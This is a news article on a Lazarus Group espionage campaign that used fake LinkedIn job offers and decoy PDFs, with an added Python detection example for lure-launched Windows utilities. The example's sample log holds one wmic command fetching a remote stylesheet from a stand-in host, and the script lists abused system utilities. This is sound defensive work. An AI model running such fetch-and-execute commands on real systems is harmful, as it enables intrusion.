The attack, carried out by the Lazarus Group, whose activity is widely attributed to North Korea and which targeted the defense industry, is part of an organized and ongoing campaign. For years most cyber experts have regarded Lazarus as an arm of North Korea's intelligence services. Kim Jong Un's military is said to maintain a corps of about 6,000 active hackers. According to information Calcalist received from sources in the Israeli cyber industry, the group has been running the campaign for about two years and its targets include countries in Western Europe, Chile and, of course, Asia.
The concern is that the North Korean hackers passed sensitive information to Iran. The Islamic Republic has been trying to attack critical infrastructure in Israel for the past six months and has reportedly even penetrated the computer systems of Mekorot, the national water company. Shortly afterwards it was reported that Shahid Rajaee, one of Iran's major ports, had been shut down by a cyber attack last May that foreign publications attributed to Israel. It is not clear whether there is any connection between these events; since North Korea's campaign appears to be aimed at espionage rather than physical damage, it may well be unrelated to them.
The current campaign, which also affected Israel, was identified two months ago by the Slovak cyber-security company ESET, which passed the information to all relevant parties. Lazarus Group attacks serve two main purposes: stealing information and stealing money, the latter being a way of bringing foreign currency into Pyongyang. LinkedIn was chosen because it is very easy to send messages on the network and to hide malicious code in the documents exchanged through it.
In recent years a number of vulnerabilities in LinkedIn's security mechanisms that enabled this kind of abuse have been disclosed and since fixed. It is not clear whether the current campaign exploited those weaknesses or newer ones that have not yet been fixed. According to ESET's researchers, the files were sent either directly through LinkedIn or in an email containing a OneDrive link, for which the attackers set up email accounts matching the fake LinkedIn personas behind their job advertisements.
When the recipient opened the file, a seemingly innocent PDF with details of the salary offered for the fake job was displayed. Meanwhile the victim's computer was compromised and the attackers gained an initial foothold in the system. The attackers then carried out targeted attacks against European aviation and space companies. Among the tools they used was a multi-stage, customizable malicious application that impersonated legitimate software, together with modified versions of an open-source tool. They also abused built-in Windows utilities to carry out additional operations.
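The delivery pattern described above (a lure opened by the user, a decoy PDF displayed, a built-in Windows utility launched to do the real work) is something a detection engineer can hunt for in process-creation telemetry. The following is an added example, not code from the article or from ESET: it parses constructed Sysmon-style process-creation events and flags a user-launched process that spawned an abused utility with a command line pointing at a user-writable path or a URL, noting whether the same parent also opened a document viewer. The field names, the list of abused utilities, and the sample events are all assumptions made for this example; the article does not name the utilities the attackers used.

```python
import json
import re
from collections import defaultdict
from dataclasses import dataclass

# Built-in Windows utilities commonly abused to fetch or run a payload.
# Assumed list for this example; the article does not name the utilities used.
LOLBINS = {"wmic.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe",
           "mshta.exe", "powershell.exe", "bitsadmin.exe"}
# Processes that typically sit between a user's double-click and whatever runs next.
USER_LAUNCHERS = {"explorer.exe", "winrar.exe", "7zfm.exe", "cmd.exe"}
# Viewers that would display the decoy PDF.
DOC_VIEWERS = {"acrord32.exe", "msedge.exe", "chrome.exe", "foxitreader.exe"}
# Command lines that reach into user-writable locations or out to the network.
USER_PATH = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)
URL = re.compile(r"https?://", re.I)


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    """Parse one JSON process-creation event per line (Sysmon event 1 style names, assumed)."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        d = json.loads(line)
        events.append(Event(int(d["ProcessId"]), int(d["ParentProcessId"]),
                            d["Image"], d.get("CommandLine", "")))
    return events


def find_lure_chains(events):
    """One finding per user-launched parent that spawned an abused utility whose
    command line touches a user-writable path or a URL. 'decoy_opened' records
    whether the same parent also started a document viewer (the salary PDF)."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)
    findings = []
    for parent_pid, kids in children.items():
        parent = by_pid.get(parent_pid)
        if parent is None or basename(parent.image) not in USER_LAUNCHERS:
            continue
        decoy_opened = any(basename(k.image) in DOC_VIEWERS for k in kids)
        for k in kids:
            if basename(k.image) in LOLBINS and (USER_PATH.search(k.cmdline) or URL.search(k.cmdline)):
                findings.append({
                    "parent": basename(parent.image),
                    "utility": basename(k.image),
                    "cmdline": k.cmdline,
                    "decoy_opened": decoy_opened,
                })
    return findings


# Constructed sample telemetry: a user opens a lure from explorer.exe, which shows a
# PDF and also launches wmic.exe against a remote stylesheet. The powershell.exe under
# svchost.exe and the certutil.exe hashing a system file are benign noise.
SAMPLE_LOG = r'''
{"ProcessId": 500, "ParentProcessId": 1, "Image": "C:\\Windows\\System32\\userinit.exe", "CommandLine": "userinit.exe"}
{"ProcessId": 1000, "ParentProcessId": 500, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}
{"ProcessId": 2000, "ParentProcessId": 1000, "Image": "C:\\Program Files\\Adobe\\Acrobat Reader\\AcroRd32.exe", "CommandLine": "\"AcroRd32.exe\" \"C:\\Users\\alice\\AppData\\Local\\Temp\\Salary_Details.pdf\""}
{"ProcessId": 2010, "ParentProcessId": 1000, "Image": "C:\\Windows\\System32\\wbem\\wmic.exe", "CommandLine": "wmic os get /format:\"https://cdn.example.invalid/update.xsl\""}
{"ProcessId": 2500, "ParentProcessId": 500, "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}
{"ProcessId": 3000, "ParentProcessId": 2500, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\Users\\alice\\Downloads\\script.ps1"}
{"ProcessId": 3100, "ParentProcessId": 1000, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"}
{"ProcessId": 3200, "ParentProcessId": 3100, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -hashfile C:\\Windows\\System32\\kernel32.dll SHA256"}
'''


def run_sample():
    return find_lure_chains(parse_events(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The rule deliberately requires both a user-facing parent and a command line that reaches into a user-writable path or the network: the powershell.exe child of svchost.exe and the certutil.exe hashing a system file are skipped, while the wmic.exe started alongside the decoy PDF is reported with decoy_opened set. In production the same logic would run over a SIEM export with a time window added so the decoy and the utility only correlate when started close together.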
“The attacks we investigated showed all the signs of espionage, with a number of clues suggesting a possible link to the infamous Lazarus hacker group. However, neither the malware analysis nor the investigation itself allowed us to gain insights into which files the attackers targeted,” Clarsky added. In addition to the espionage operations, ESET investigators found evidence that the attackers tried to use hacked accounts to steal money from other companies.